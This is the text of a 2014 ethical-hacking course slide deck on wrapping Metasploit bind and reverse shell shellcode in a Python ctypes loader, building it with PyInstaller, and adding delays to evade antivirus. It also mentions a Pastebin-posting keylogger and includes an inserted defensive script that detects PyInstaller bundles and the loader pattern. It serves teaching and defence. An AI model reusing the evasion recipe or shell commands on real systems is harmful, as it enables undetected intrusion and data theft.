Violent Python

Innovations in Cybersecurity Education Workshop
June 24, 2014

Bio

Pedagogy

Diversity in Education

• Students have different previous experience, knowledge and goals
• They aren't all going to learn the same things in the same class
• My goal is NOT to make them all achieve the same proficiency
• My goal is to provide every student with material they can grasp and interesting challenges

Beginners

• Textbook that covers the material
• Online training at CodeCademy
• DVDs with virtual machines ready to go
• Hands-on projects with complete step-by-step instructions
• Lab time after each class with the instructor available to help
• Extensive open lab time

Average Students

• Configure their own home machines to do the projects
• Work at home, with no instructor available
• Simple challenge projects without instructions

Advanced Students

• Advanced challenges
• Online security puzzle sites
• Cyber competitions
• Following the news, independent work on cutting-edge topics

Independent Projects

• Students can get extra credit by
  – Attending other training events
  – In-class presentations
  – Researching other tools or techniques

Grading

• Must achieve a level of points to get a good grade
• Many possible combinations of projects can get there
• May skip the final exam

CNIT 124
Advanced Ethical Hacking

Two Textbooks

Required          Optional

Violent Python

• Good coding principles
  – Exception handling
  – Modular design
  – Optimization
  – Commenting
  – Flow charts
• FORGET THEM ALL

Violent Python

• We are hackers
• We are here to BREAK STUFF
• It should be fast and easy for a complete novice to hack together a simple script to do something fun!

Projects

Antivirus

Ungh! Good God y'all...

What is it GOOD For?

Mikko Hypponen Video

Metasploit Payloads

Metasploit

• Hundreds of payloads
• The simplest one: bind_tcp
• Listens on a TCP port for commands

Simple Reverse Shell

• One command to produce very simple Windows EXE malware

Antivirus Catches It

Norton v. Shell.exe

Norton Identifies the Metasploit Packer

VirusTotal: 37/49 Detections

How to Become 007

Python v. AV
Round 1
shell_bind_tcp

Export Metasploit Payloads to C

Use Ctypes Python Library

Compile it on Windows

• Install these things, in order
  – Python 2.7
  – PyWin32
  – pip-Win
  – PyInstaller
• This creates an EXE file that listens on a TCP port

DEMO

• On Kali

    msfpayload windows/shell_bind_tcp C > foo
    nano foo

• Change top to

    from ctypes import *
    shellcode = (

• Change bottom to

    );
    memorywithshell = create_string_buffer(shellcode, len(shellcode))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()

DEMO

• On Windows, in pip-Win:

    venv -c -i pyi-env-name
    pyinstaller --onefile --noconsole foo
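The procedure above leaves two things behind that a defender can key on: the PyInstaller one-file wrapper around the EXE, and the ctypes loader skeleton in the script (a byte string copied into a writable buffer, cast to a function pointer and called). The following triage script is an added example in Python 3, not part of the deck; it assumes the archive magic used by PyInstaller's own archive reader (confirm it against the PyInstaller release you are dealing with), and every file body and source sample it scans is constructed inline.

```python
import re
from typing import Dict, List, Union

# PyInstaller writes a CArchive "cookie" into every --onefile bundle; this is the
# magic that cookie starts with in PyInstaller's archive reader (assumption:
# verify against the release in use, the cookie layout has changed over time).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# Source-level indicators of the ctypes loader pattern shown in the deck.
LOADER_INDICATORS = [
    (re.compile(r"\bcreate_string_buffer\s*\("),
     "create_string_buffer(): bytes copied into a writable ctypes buffer"),
    (re.compile(r"\bcast\s*\(.*\bCFUNCTYPE\s*\(\s*c_void_p\s*\)", re.S),
     "cast(..., CFUNCTYPE(c_void_p)): buffer turned into a callable"),
    (re.compile(r"\b(raw_input|time\.sleep)\s*\("),
     "blocking prompt or sleep ahead of the call (the delay tactic from the deck)"),
]


def is_pyinstaller_bundle(data: bytes) -> bool:
    """True when the PyInstaller archive magic appears anywhere in the file body."""
    return PYINSTALLER_MAGIC in data


def loader_indicators(src: str) -> List[str]:
    """Human-readable reasons that matched in a Python source file."""
    return [why for pat, why in LOADER_INDICATORS if pat.search(src)]


def is_ctypes_loader(src: str) -> bool:
    """The loader pattern needs both the writable buffer and the function-pointer cast;
    a prompt or sleep on its own is far too common to count."""
    hits = loader_indicators(src)
    return (any(h.startswith("create_string_buffer") for h in hits)
            and any(h.startswith("cast(") for h in hits))


def triage(name: str, content: Union[bytes, str]) -> Dict[str, object]:
    """Route a file to a verdict: raw bytes get the packer check, source gets the
    loader check. The packer check alone only says 'look closer', never 'malicious'."""
    if isinstance(content, bytes):
        bundle = is_pyinstaller_bundle(content)
        reasons = ["PyInstaller one-file bundle"] if bundle else []
        verdict = "PyInstaller bundle: inspect embedded scripts" if bundle else "no indicators"
    else:
        bundle = False
        reasons = loader_indicators(content)
        verdict = "likely shellcode loader" if is_ctypes_loader(content) else "no indicators"
    return {"name": name, "pyinstaller_bundle": bundle, "reasons": reasons, "verdict": verdict}


# Constructed samples. The "shellcode" below is a placeholder string, not real code.
SUSPECT_SRC = '''\
x=raw_input("Press Enter to continue")
from ctypes import *
shellcode = (
"PLACEHOLDER-NOT-REAL-SHELLCODE"
);
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
'''
BENIGN_SRC = '''\
from ctypes import windll, c_int
# ordinary FFI use: call an exported function by name, no self-built code buffer
windll.user32.MessageBoxW(None, "hi", "title", c_int(0))
'''
# Stand-ins for files on disk: a fake PE header, then (in one case) the cookie magic.
BUNDLE_BYTES = b"MZ" + b"\x00" * 62 + b"bootloader..." + PYINSTALLER_MAGIC + b"\x00" * 24
PLAIN_BYTES = b"MZ" + b"\x00" * 62 + b"some ordinary program"

if __name__ == "__main__":
    for name, content in [("rev.py", SUSPECT_SRC), ("gui.py", BENIGN_SRC),
                          ("rev.exe", BUNDLE_BYTES), ("plain.exe", PLAIN_BYTES)]:
        print(triage(name, content))
```

The magic check is a packer signature, not a malware signature: every legitimate application shipped with PyInstaller matches it too, which is the same limitation the deck illustrates when Norton identifies "the Metasploit packer" rather than the payload. Use it to route files into deeper inspection (extract the bundle, scan the recovered scripts with the loader check), and treat the loader verdict as the actionable one.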
VirusTotal: 1/50 Detection

Norton Support

• I Tweeted about this, and @NortonSupport replied
• VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
• @NortonSupport gave me a link for a 30-day trial version :)

Norton Wins!

Kaspersky Wins!

• Avast! doesn't detect it
• Kaspersky detects it as HEUR:Trojan.Win32.Generic

Python v. AV
Round 2
shell_bind_tcp with a delay

DEMO

• On Kali

    cp foo foo2
    nano foo2
    x=raw_input("Press Enter to continue")

• On Windows, in pip-Win:

    venv -c -i pyi-env-name
    pyinstaller --onefile foo2

Norton, Avast, & MSE Lose!

Kaspersky Wins!

Python v. AV
Round 3
shell_bind_tcp in two stages
no delay

Other AV

• Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
• All these failed
  – Norton
  – Nod32
  – Avast!
  – 360 Internet Security
  – McAfee
  – Kaspersky

Remember Mikko?

F-Secure Wins!

AV Challenge

• Posted April 3, 2014
• No reply from AV vendors, but Norton improved its detection after that
  – Now a delay is required

Python v. AV
Round 4
shell_bind_tcp with a delay

INSTRUCTIONS

• On Kali

    msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev
    nano rev

• Change top to

    x=raw_input("Press Enter to continue")
    from ctypes import *
    shellcode = (

• Change bottom to

    );
    memorywithshell = create_string_buffer(shellcode, len(shellcode))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()

INSTRUCTIONS

• On Windows, in pip-Win:

    venv -c -i pyi-env-name
    pyinstaller --onefile rev

• On Kali

    nc -lp 4444

Norton Loses

Kaspersky Wins

Advanced Malware Protection

ty @ChrisAbdalla_1 from HP ESP TippingPoint

• A friend in the financial industry tested Evil.exe on a system protected by FireEye
• FireEye gives no alerts and lets it post keystrokes right to Pastebin

Python Keylogger

Google "Python Keylogger"

• I used this one from 4 years ago

Post Keystrokes to Pastebin

Problem

• Pastebin busted me for making too many pastes in a 24-hour period
• So I wrote my own Pastebin imitation
Kaspersky & Avast! LOSE

Norton WINS!

But just add a delay...

F-Secure LOSES!

PRODUCT ANNOUNCEMENT!

Ultra-Advanced APT Tool

samsclass.info/evil.exe

UNSTOPPABLE

• None of these products stop it
  – Norton
  – McAfee
  – Kaspersky
  – Nod32
  – F-Secure
  – Avast!
  – Microsoft Security Essentials